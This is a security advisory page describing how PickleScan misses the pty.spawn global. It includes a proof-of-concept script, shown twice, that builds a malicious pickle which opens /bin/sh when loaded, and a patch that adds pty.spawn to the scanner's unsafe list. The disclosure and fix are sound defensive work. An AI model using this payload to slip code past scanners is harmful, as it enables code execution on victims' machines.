ghsa-hgrh-qx5j-jfwx
Vulnerability from github
Published
2025-12-29 15:26
Modified
2025-12-29 15:26
Severity ?
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Summary
Picklescan Bypasses Unsafe Globals Check using pty.spawn
Details

Summary

The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the pty library (more specifically, of the pty.spawn function) from PickleScan's list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.

Details

For 2025's HeroCTF, there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and Fickling to gain code execution. The challenge writeup, files and solve script have all been released.

The intended way was to use pty.spawn but some players found alternative solutions.

PoC

  • Run the following Python code to generate the PoC pickle file.

```py import pickle

command = b"/bin/sh"

payload = b"".join( [ pickle.PROTO + pickle.pack("B", 4), pickle.MARK, pickle.GLOBAL + b"pty\n" + b"spawn\n", pickle.EMPTY_LIST, pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command, pickle.APPEND, # Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes pickle.OBJ, pickle.STOP, ] )

with open("dump.pkl", "wb") as f: f.write(payload) ```

  • Run PickleScan on the generated pickle file. picklescan_bypass_pty_spawn

PickleScan detects the pty.spawn global as "suspicious" but not "dangerous", allowing it to be loaded.

Impact

Severity: High Affected Users: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content. Impact Details: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the pty.spawn function. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded.

Suggested Patch

diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py index 34a5715..b434069 100644 --- a/src/picklescan/scanner.py +++ b/src/picklescan/scanner.py @@ -150,6 +150,7 @@ _unsafe_globals = { "_pickle": "*", "pip": "*", "profile": {"Profile.run", "Profile.runctx"}, + "pty": "spawn", "pydoc": "pipepager", # pydoc.pipepager('help','echo pwned') "timeit": "*", "torch._dynamo.guards": {"GuardBuilder.get"},

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-29T15:26:37Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nThe vulnerability allows malicious actors to bypass PickleScan\u0027s unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of  the `pty.spawn` function) from PickleScan\u0027s list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.\n\n### Details\nFor 2025\u0027s [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released.\n\nThe intended way was to use `pty.spawn` but some players found alternative solutions.\n\n### PoC\n\n- Run the following Python code to generate the PoC pickle file.\n\n```py\nimport pickle\n\ncommand = b\"/bin/sh\"\n\npayload = b\"\".join(\n    [\n        pickle.PROTO + pickle.pack(\"B\", 4),\n        pickle.MARK,\n        pickle.GLOBAL + b\"pty\\n\" + b\"spawn\\n\",\n        pickle.EMPTY_LIST,\n        pickle.SHORT_BINUNICODE + pickle.pack(\"B\", len(command)) + command,\n        pickle.APPEND,\n        # Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes\n        pickle.OBJ,\n        pickle.STOP,\n    ]\n)\n\nwith open(\"dump.pkl\", \"wb\") as f:\n    f.write(payload)\n```\n\n- Run PickleScan on the generated pickle file.\n\u003cimg width=\"936\" height=\"311\" alt=\"picklescan_bypass_pty_spawn\" src=\"https://github.com/user-attachments/assets/0d6430e4-a7e5-461c-9d75-c607f6886c9f\" /\u003e\n\nPickleScan detects the `pty.spawn` global as \"suspicious\" but not \"dangerous\", allowing it to be loaded.\n\n### Impact\n**Severity**: High\n**Affected Users**: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content.\n**Impact Details**: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the `pty.spawn` function. This could lead to arbitrary code execution on the user\u0027s system when these malicious files are processed or loaded.\n\n### Suggested Patch\n\n```\ndiff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py\nindex 34a5715..b434069 100644\n--- a/src/picklescan/scanner.py\n+++ b/src/picklescan/scanner.py\n@@ -150,6 +150,7 @@ _unsafe_globals = {\n     \"_pickle\": \"*\",\n     \"pip\": \"*\",\n     \"profile\": {\"Profile.run\", \"Profile.runctx\"},\n+    \"pty\": \"spawn\",\n     \"pydoc\": \"pipepager\",  # pydoc.pipepager(\u0027help\u0027,\u0027echo pwned\u0027)\n     \"timeit\": \"*\",\n     \"torch._dynamo.guards\": {\"GuardBuilder.get\"},\n```",
  "id": "GHSA-hgrh-qx5j-jfwx",
  "modified": "2025-12-29T15:26:37Z",
  "published": "2025-12-29T15:26:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/53"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Picklescan Bypasses Unsafe Globals Check using pty.spawn"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.